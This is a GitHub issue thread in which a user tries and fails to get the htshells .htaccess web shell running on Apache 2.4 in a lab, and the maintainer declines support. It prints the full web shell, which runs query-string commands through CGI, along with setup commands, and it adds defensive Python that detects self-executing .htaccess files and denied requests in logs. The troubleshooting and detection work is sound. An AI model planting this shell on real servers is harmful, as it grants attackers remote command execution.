
Comments (4)

wireghoul commented on May 25, 2024

htshells should work on Apache2. Did you uncomment the line per the comments in the file?


h00die commented on May 25, 2024

To set this up:

  1. I installed an Ubuntu 20.04 (server). apt-get update and apt-get dist-upgrade
  2. apt-get install apache2
  3. a2enmod cgi
  4. apache2ctl restart
  5. confirm we're in working order:
    ubuntu@ubuntu2004:~$ curl --silent 127.0.0.1 | head
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
      <!--
        Modified from the Debian original for Ubuntu
        Last updated: 2016-11-16
        See: https://launchpad.net/bugs/1288690
      -->
      <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    
  6. wget -O /var/www/html/.htaccess https://raw.githubusercontent.com/wireghoul/htshells/master/shell/mod_cgi.shell.bash.htaccess
  7. chmod +x /var/www/html/.htaccess
  8. sed -i 's/# Require all granted/ Require all granted/' /var/www/html/.htaccess
  9. Double check we're all good:
    ubuntu@ubuntu2004:~$ cat /var/www/html/.htaccess
    #!/bin/sh
    # Self contained .htaccess web shell - Part of the htshell project
    # Written by Wireghoul - http://www.justanotherhacker.com
    # IMPORTANT: Needs chmod +x to run
    # Run commands via http://url/.htaccess?cmd (ie: http://url/.htaccess?uname -a)
    
    # Big shout out to the rosetta code website which provided the example below!
    # This is considered a line spanning comment in apache and not by shell #winning \
    echo -en "Content-Type: text/plain\r\n\r\n";cmd=$(echo $QUERY_STRING | sed -e's/+/ /g' -e's/%20/ /g');echo "\$ $cmd";$cmd 2>&1;exit
    # The exit ensures we never reach the following lines which would break the shell parser
    
    # Override default deny rule to make .htaccess file accessible over web
    <Files ~ "^\.ht">
    # Uncomment the line below for Apache2.4 and newer
      Require all granted
        Order allow,deny
        Allow from all
    </Files>
    
    # Enable  CGI
    Options +ExecCGI
    
    #Make apache treat .htaccess as a cgi file
    AddHandler cgi-script .htaccess
    
  10. apache2ctl restart (just to be certain everything is correct)
  11. Give it a go:
    curl --silent "http://127.0.0.1/.htaccess?whoami" | head
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>403 Forbidden</title>
    </head><body>
    <h1>Forbidden</h1>
    <p>You don't have permission to access this resource.</p>
    <hr>
    <address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address>
    </body></html>
  12. Logs:
    ubuntu@ubuntu2004:~$ tail -n 1 /var/log/apache2/error.log
    [Sat Jan 08 15:24:06.423878 2022] [authz_core:error] [pid 3034:tid 139833246701312] [client 127.0.0.1:46224] AH01630: client denied by server configuration: /var/www/html/.htaccess

All changes to the server are listed here. However, for the sake of consistency, here's the only enabled site config:

<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Thus, it seems the default config is blocking this in some way shape or form. I spent some time trying to debug, but didn't make any progress.

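From the defender's side, the two artifacts in the comment above are worth automating: the AH01630 "client denied by server configuration" line that the denied request left in the error log, and the directives that make a docroot .htaccess execute itself (a shebang, `Options +ExecCGI`, `AddHandler cgi-script .htaccess`, and a `<Files>` block that re-grants access to `.ht*` files). The Python below is an added example written for this page, not code from the issue thread or from the htshells project; the sample .htaccess text and error-log lines are constructed from what the comment quotes, the second log line is a made-up startup notice, and the finding names are this example's own labels.

```python
import os
import re
import stat

# Constructed sample: the .htaccess quoted in the comment above, cut down to the directives
# that make it self-executing (the command-runner line itself is not needed for the check).
SAMPLE_HTACCESS = """#!/bin/sh
# Self contained .htaccess web shell - Part of the htshell project
<Files ~ "^\\.ht">
  Require all granted
    Order allow,deny
    Allow from all
</Files>
Options +ExecCGI
AddHandler cgi-script .htaccess
"""

# Constructed sample of an ordinary .htaccess that should raise no finding.
BENIGN_HTACCESS = """RewriteEngine On
RewriteRule ^old-page$ /new-page [R=301,L]
"""

# Constructed sample error-log lines: the first is the AH01630 line quoted in the comment,
# the second is a hypothetical startup notice used to show that unrelated lines are ignored.
SAMPLE_ERROR_LOG = [
    "[Sat Jan 08 15:24:06.423878 2022] [authz_core:error] [pid 3034:tid 139833246701312] "
    "[client 127.0.0.1:46224] AH01630: client denied by server configuration: /var/www/html/.htaccess",
    "[Sat Jan 08 15:25:10.000000 2022] [core:notice] [pid 3030] AH00094: Command line: '/usr/sbin/apache2'",
]


def htaccess_findings(text):
    """Return the list of indicators (this example's own labels) found in one .htaccess body."""
    findings = []
    lines = text.splitlines()
    if lines and lines[0].startswith("#!"):
        findings.append("shebang")  # a config file that begins like a script
    if re.search(r"^\s*Options\s+[^\n]*ExecCGI", text, re.M | re.I):
        findings.append("execcgi")  # CGI execution enabled from a per-directory file
    if re.search(r"^\s*AddHandler\s+cgi-script\b[^\n]*\.htaccess", text, re.M | re.I):
        findings.append("cgi-handler-on-htaccess")  # the config file is its own CGI program
    # Heuristic: a <Files>/<FilesMatch> block aimed at .ht* files together with an allow rule;
    # it does not verify that the allow rule sits inside that block.
    if re.search(r"<Files(?:Match)?[^>]*\.ht", text, re.I) and re.search(
        r"Require\s+all\s+granted|Allow\s+from\s+all", text, re.I
    ):
        findings.append("dotfile-access-override")
    return findings


def scan_docroot(root):
    """Walk a document root and report every .htaccess that has findings. The executable
    bit is reported as its own finding, since the shell above needs chmod +x to run."""
    report = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if ".htaccess" not in filenames:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = htaccess_findings(fh.read())
        if os.stat(path).st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
            findings.append("executable")
        if findings:
            report[path] = findings
    return report


# Apache 2.4 error-log layout as seen in the quoted line: [timestamp] [module:level]
# [pid N:tid M] [client IP:port] AHxxxxx: message. The tid and client fields are optional.
LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<module>[^:\]]+):(?P<level>[^\]]+)\] "
    r"\[pid (?P<pid>\d+)(?::tid \d+)?\] (?:\[client (?P<client>[^\]]+)\] )?"
    r"(?P<code>AH\d+): (?P<msg>.*)$"
)


def parse_error_line(line):
    """Split one error-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def denied_dotfile_requests(lines):
    """Return (client, path) for every AH01630 denial whose target is a .ht* file."""
    hits = []
    for line in lines:
        rec = parse_error_line(line)
        if not rec or rec["code"] != "AH01630":
            continue
        path = rec["msg"].rsplit(": ", 1)[-1]
        if os.path.basename(path).startswith(".ht"):
            hits.append((rec["client"], path))
    return hits


if __name__ == "__main__":
    print(htaccess_findings(SAMPLE_HTACCESS))
    print(htaccess_findings(BENIGN_HTACCESS))
    print(denied_dotfile_requests(SAMPLE_ERROR_LOG))
```

On the quoted log line the denial is recorded by authz_core, so the request never reached mod_cgi; a run of `denied_dotfile_requests` over the real error log therefore shows attempts that the server's access rules stopped, while `scan_docroot("/var/www/html")` shows whether a self-executing .htaccess is sitting in the docroot regardless of whether requests to it currently succeed.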

h00die commented on May 25, 2024

any updates?


wireghoul commented on May 25, 2024

Sorry, there is no unpaid tech support for this project. Between this talk (https://youtu.be/p1aCTBZrIOw) the Apache documentation and your server logs you should be able to figure it out.

In most real world scenarios I've seen you usually only get one shot at generating the correct htaccess file for the server config in use. Or you can write a specific exploit for a known configuration. Tbh I'd rather not see htshells as a payload function in metasploit, as I fear that will just generate a large number of support requests from users who had their exploit fail and use GitHub to demand answers.
